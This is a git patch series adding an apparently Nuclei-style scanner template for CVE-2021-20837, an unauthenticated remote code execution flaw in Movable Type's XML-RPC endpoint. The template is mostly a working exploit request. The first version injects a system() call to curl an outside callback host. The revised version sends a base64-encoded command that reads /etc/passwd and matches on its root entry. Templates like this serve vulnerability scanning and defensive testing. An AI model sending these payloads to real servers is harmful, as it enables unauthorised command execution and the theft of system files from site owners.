From 83e431802eef6660eeb735e47dba87f3c5fa2b67 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 10 Jan 2022 21:44:31 -0500
Subject: [PATCH 1/2] =?UTF-8?q?Create=20CVE-2021=E2=80=9320837.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cves/2021/CVE-2021–20837.yaml | 37 +++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 cves/2021/CVE-2021–20837.yaml
diff --git a/cves/2021/CVE-2021–20837.yaml b/cves/2021/CVE-2021–20837.yaml
new file mode 100644
index 0000000000..be3326855d
--- /dev/null
+++ b/cves/2021/CVE-2021–20837.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021–20837
+
+info:
+ name: Unauthenticated RCE Vulnerability In MovableType
+ author: pikpikcu
+ severity: critical
+ description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
+ tags: cve,cve2021,movabletype,rce
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
+ - https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+
+
+ mt.handler_to_coderef
+
+
+
+ system("curl","http://{{interactsh-url}}")
+
+
+
+
+
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
From 70677b3b5afc4b7f94ea51721bb170ee1a2313d8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 11 Jan 2022 14:12:04 +0530
Subject: [PATCH 2/2] =?UTF-8?q?Update=20CVE-2021=E2=80=9320837.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cves/2021/CVE-2021–20837.yaml | 27 +++++++++++++++++----------
1 file changed, 17 insertions(+), 10 deletions(-)
diff --git a/cves/2021/CVE-2021–20837.yaml b/cves/2021/CVE-2021–20837.yaml
index be3326855d..f417535f23 100644
--- a/cves/2021/CVE-2021–20837.yaml
+++ b/cves/2021/CVE-2021–20837.yaml
@@ -1,14 +1,13 @@
-id: CVE-2021–20837
-
+id: CVE-2021-20837
info:
name: Unauthenticated RCE Vulnerability In MovableType
author: pikpikcu
severity: critical
description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
- tags: cve,cve2021,movabletype,rce
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
- https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
+ tags: cve,cve2021,movabletype,rce
requests:
- raw:
@@ -16,22 +15,30 @@ requests:
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
-
+
mt.handler_to_coderef
-
- system("curl","http://{{interactsh-url}}")
-
+ YGNhdCAvZXRjL3Bhc3N3ZGA=
+ matchers-condition: and
matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
+
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: header
words:
- - "http"
+ - "text/xml"